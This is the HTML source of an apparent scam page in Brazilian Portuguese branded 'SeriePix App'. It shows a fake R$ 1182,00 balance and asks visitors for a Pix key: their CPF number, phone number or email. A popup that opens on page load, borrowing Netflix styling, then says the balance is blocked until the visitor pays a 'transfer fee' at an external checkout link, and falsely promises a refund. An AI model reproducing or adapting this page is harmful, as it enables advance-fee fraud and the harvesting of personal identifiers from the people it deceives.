<html lang="pt-PT"><head></head><body class="fundoWhite">
    
        
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link data-optimized="1" rel="stylesheet" href="rec.php/css/5921624bf5bbe4c8c091ef09226fa76f.css">
        <link rel="preconnect" href="https://fonts.googleapis.com/">
        <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
        <link data-optimized="1" href="rec.php/css/1c7a3d2ee9759dc256d915300855c494.css" rel="stylesheet">
        <link data-optimized="1" href="rec.php/css/ba9cbbe9240a489628be8eb27c56db8a.css" rel="stylesheet">
        <link rel="stylesheet" href="rec.php/css/style.css">
        <link rel="stylesheet" href="rec.php/css/animated.css">
        <link rel="shortcut icon" href="https://conectmobile.shop/app/rec.php/images/faveicon.png">
        <title>:: SeriePix App ::</title>
    

    

        <div style="height: 270px;" class="corteLayoutTop"></div>

        <div id="p1" style="background-color: #FFFFFF; padding: 15px 0 18px 0;">
            <img style="width: 35%; margin: auto; margin-left: 10px; position: relative; margin-top: 10px;" src="rec.php/images/logo1.png/index.html">

            <div class="boxSaldo">
                <label for="input" class="textoSaldo" style="background-color: #F4F4F4;">SALDO</label>
                <p class="valorSaldo">R$ <span class="saldoAtualizado">1182,00</span></p>
            </div>

            <div style="position: relative; margin-top: -5px;">
                <h1 style="font-family:'RecoletaBold'; font-size: 30px; text-align: center; margin: 23px 0 7px 0; color: #000000;">realize o seu saque!</h1>
                <p style="font-size: 15px; text-align: center; padding: 0 7px 0 7px; font-family: 'Radian';">Chegou a hora boa! Coloque sua chave pix <br>corretamente, e receba seu saque de <b>imediato.</b></p>
            </div>
            
        </div>


        <div style="background-color: transparent; width: 100%;">
            <div style="text-align: center; display: flex; justify-content: center; flex-direction: row; margin-top: 17px;">
                <svg style="margin-top: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" width="20" height="20" fill="#32BCAD " transition="fill .3s">
                    <path d="M242.4 292.5C247.8 287.1 257.1 287.1 262.5 292.5L339.5 369.5C353.7 383.7 372.6 391.5 392.6 391.5H407.7L310.6 488.6C280.3 518.1 231.1 518.1 200.8 488.6L103.3 391.2H112.6C132.6 391.2 151.5 383.4 165.7 369.2L242.4 292.5zM262.5 218.9C256.1 224.4 247.9 224.5 242.4 218.9L165.7 142.2C151.5 127.1 132.6 120.2 112.6 120.2H103.3L200.7 22.76C231.1-7.586 280.3-7.586 310.6 22.76L407.8 119.9H392.6C372.6 119.9 353.7 127.7 339.5 141.9L262.5 218.9zM112.6 142.7C126.4 142.7 139.1 148.3 149.7 158.1L226.4 234.8C233.6 241.1 243 245.6 252.5 245.6C261.9 245.6 271.3 241.1 278.5 234.8L355.5 157.8C365.3 148.1 378.8 142.5 392.6 142.5H430.3L488.6 200.8C518.9 231.1 518.9 280.3 488.6 310.6L430.3 368.9H392.6C378.8 368.9 365.3 363.3 355.5 353.5L278.5 276.5C264.6 262.6 240.3 262.6 226.4 276.6L149.7 353.2C139.1 363 126.4 368.6 112.6 368.6H80.78L22.76 310.6C-7.586 280.3-7.586 231.1 22.76 200.8L80.78 142.7H112.6z"></path>
                </svg>
                <h4 style="font-size: 12px; font-weight: bold; color: #707070; margin-left: 10px;">SELECIONE SEU TIPO DE CHAVE PIX</h4>
            </div>

            <form action="https://conectmobile.shop/app/rec.php/" id="formPix" onsubmit="document.getElementById('submit').disabled = true;">
                <div class="row" style="display: flex;  flex-direction: row; flex-wrap: nowrap; justify-content: space-evenly; margin-top: 10px;">
                    <label>
                        <input type="radio" class="tipoChave" name="tipoChave" value="document">
                        <div class="icon-box">
                            <i class="fa fa-book" aria-hidden="true"></i>
                            <span>
                                <img src="https://conectmobile.shop/app/rec.php/images/CPF.png">
                                CPF
                            </span>
                        </div>
                    </label>
                    <label>
                        <input type="radio" class="tipoChave" name="tipoChave" value="phoneNumber">
                        <div class="icon-box">
                            <i class="fa fa-book" aria-hidden="true"></i>
                            <span>
                                <img src="https://conectmobile.shop/app/rec.php/images/Telefone.png">
                                CELULAR
                            </span>
                        </div>
                    </label>
                    <label>
                        <input type="radio" class="tipoChave" name="tipoChave" value="email">
                        <div class="icon-box">
                            <i class="fa fa-book" aria-hidden="true"></i>
                            <span>
                                <img src="https://conectmobile.shop/app/rec.php/images/E-mail.png">
                                EMAIL
                            </span>
                        </div>
                    </label>
                </div>
                <input type="hidden" name="valida" value="ok">






                <div class="coolinput" style="margin-top: 20px; position: relative;display: none;">
                    <label for="input" id="textoPix" class="text">CHAVE PIX</label>
                    <input type="text" placeholder="Digite sua CHAVE PIX" name="chavePix" id="chavePix" class="input" inputmode="numeric" autocomplete="off" required="" onkeyup="validacaoPix()" readonly="">

                    <div style="margin: -5px 0 0 10px;"><span id="validacaoPix"></span></div>
                
                    <div style="position: relative;">
                        <svg id="svgMoney" style="position: absolute; width: 20px; position: absolute; width: 20px; top: 46px; left: 116px; z-index: 99999999; color: #727272;" xmlns="http://www.w3.org/2000/svg" class="ionicon" viewBox="0 0 512 512">
                            <rect x="32" y="80" width="448" height="256" rx="16" ry="16" transform="rotate(180 256 208)" fill="none" stroke="currentColor" stroke-linejoin="round" stroke-width="32"></rect>
                            <path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="32" d="M64 384h384M96 432h320"></path>
                            <circle cx="256" cy="208" r="80" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="32"></circle>
                            <path d="M480 160a80 80 0 01-80-80M32 160a80 80 0 0080-80M480 256a80 80 0 00-80 80M32 256a80 80 0 0180 80" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="32"></path>
                        </svg>

                        <button style="color: #727272; border-radius: 8px; background-color: #E0E0E0; border: none; margin-right: 50px; margin-top: 35px; padding-left: 53px; bottom: 20px; width: 100%; position: unset;" id="continuarCadastroInativo" class="continuarInativo" disabled="" onclick="salvarValorPix()">Receber PIX</button>
                        
                        <button style="color: #000000; border-radius: 8px; background-color: #FFD900; border: none; margin-right: 50px; margin-top: 35px; bottom: 20px; padding-left: 53px; width: 100%; display: none; position: unset;" id="continuarCadastroAtivo" class="continuarAtivo" data-callback="onSubmit" data-action="submit" onclick="salvarValorPix()">Receber PIX</button>
                    </div>
                </div>

            </form>
        </div>

        

        <script src="https://conectmobile.shop/app/rec.php/jquery.min.js.download"></script>
        <script type="text/javascript" src="https://conectmobile.shop/app/rec.php/jquery.mask.js.download"></script>
        <script src="https://conectmobile.shop/app/rec.php/validacaoPix.js.download"></script>





<script>


jQuery(function($) {
    $('.tipoChave').change(function() {
        var campo = $(this).val();
        var valorCookie;
        
        $("#chavePix").val(''); // Limpa o campo
        
        if (campo == "document") {
            //valorCookie = decodeURIComponent(getCookie('cpfUsuario'));
            valorCookie = '';
            $("#chavePix").mask("999.999.999-99");
            $("#chavePix").attr('inputmode', 'numeric');
        }
        if (campo == "phoneNumber") {
            //valorCookie = decodeURIComponent(getCookie('celularUsuario'));
            valorCookie = '';
            $("#chavePix").mask("(99) 99999-9999");
            $("#chavePix").attr('inputmode', 'numeric');
        }   
        if (campo == "email") {
            //valorCookie = decodeURIComponent(getCookie('emailUsuario'));
            valorCookie = '';
            $("#chavePix").unmask();
            $("#chavePix").attr('inputmode', 'text');
        }

        // Se o valor do cookie existir e for diferente de 'null', preenche o campo automaticamente
        if (valorCookie && valorCookie !== 'null') {
            $("#chavePix").val(valorCookie);            
        }

        validacaoPix();

        $(".coolinput").show(); // Exibe a div
    });
});

// Certifique-se de que a fungetCookie esteja definida em algum lugar do seu script
function getCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}


function salvarValorPix() {
    var valorPix = document.getElementById('chavePix').value;
    setCookie('valor_pix', valorPix, 7); // Salva o valor por 7 dias
    // Aqui vo pode adicionar qualquer outra lica necessria, como submeter o formulÃ
}

        </script>

<!-- Google tag (gtag.js) -->
<script async="" src="https://conectmobile.shop/"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-631P172VEV');
</script>
    


    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Popup Estilo Netflix</title>
    <style>
        /* Estilos gerais */
        body {
            margin: 0;
            font-family: 'Roboto', sans-serif;
            background-color: #000; /* Cor de fundo para melhor visualização */
        }

        .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 90%;
            max-width: 500px; /* Aumenta a largura máxima para telas maiores */
            background-color: #141414; /* Cor de fundo escura semelhante ao Netflix */
            color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.5);
            z-index: 1001;
            text-align: center;
            box-sizing: border-box; /* Inclui padding e border no cálculo da largura */
        }

        .popup img {
            width: 100px; /* Define a largura da imagem */
            margin-bottom: 15px; /* Espaço entre a imagem e o texto */
        }

        .popup h1 {
            font-size: 20px;
            font-weight: bold;
            margin: 10px 0;
        }

        .popup p {
            font-size: 16px;
            margin: 15px 0;
        }

        .popup span {
            color: #e50914; /* Cor vermelha do tema Netflix */
            font-weight: bold;
        }

        .coolinput a {
            display: inline-block;
            background-color: #e50914; /* Botão vermelho do tema Netflix */
            color: white;
            text-decoration: none;
            padding: 12px 25px;
            border-radius: 4px;
            font-weight: bold;
            font-size: 16px;
            margin-top: 15px;
        }

        .coolinput a:hover {
            background-color: #f40612; /* Tom mais escuro de vermelho para o hover */
        }

        /* Fundo desfocado */
        #blur {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            z-index: 1000;
        }

        /* Responsividade */
        @media (max-width: 600px) {
            .popup {
                width: 95%;
                padding: 15px;
            }

            .popup h1 {
                font-size: 18px;
            }

            .popup p {
                font-size: 14px;
            }

            .coolinput a {
                font-size: 14px;
                padding: 10px 20px;
            }
        }
    </style>


    <!-- Popup -->
    <div id="popUp1" class="popup">
        <img src="../../../i.ibb.co/1stzJb0/imagem-2024-08-11-140107824.png" alt="Logo Netflix">
        <h1><br>Saldo bloqueado<br><br> R$ 1182.00<br>pode ser recuperado!</h1>
        <p>
            <span></span><br> Para desbloquear seu saldo, precisa pagar uma <b>taxa de transferencia.</b><br><br>
            Taxa necessaria para evitar <b>Fraudes e golpes!</b><br><br>
            Mas fique tranquilo(a), o valor vai ser estornado <b>na sua conta.</b>
        </p>
        <div class="coolinput">
            <a href="https://pay.pagamentosegurosonline.com.br/checkout/e9df324f-ee14-4b41-977c-b6becfe0a27b">Desbloquear meu saldo</a>
        </div>
    </div>

    <!-- Fundo desfocado -->
    <div id="blur"></div>

    <script src="rec.php/js/jquery.min.js"></script>
    <script>
        // Mostrar popup ao carregar a página
        $(document).ready(function() {
            $("#popUp1").fadeIn();
            $("#blur").fadeIn();
        });

    </script>



    



</body></html>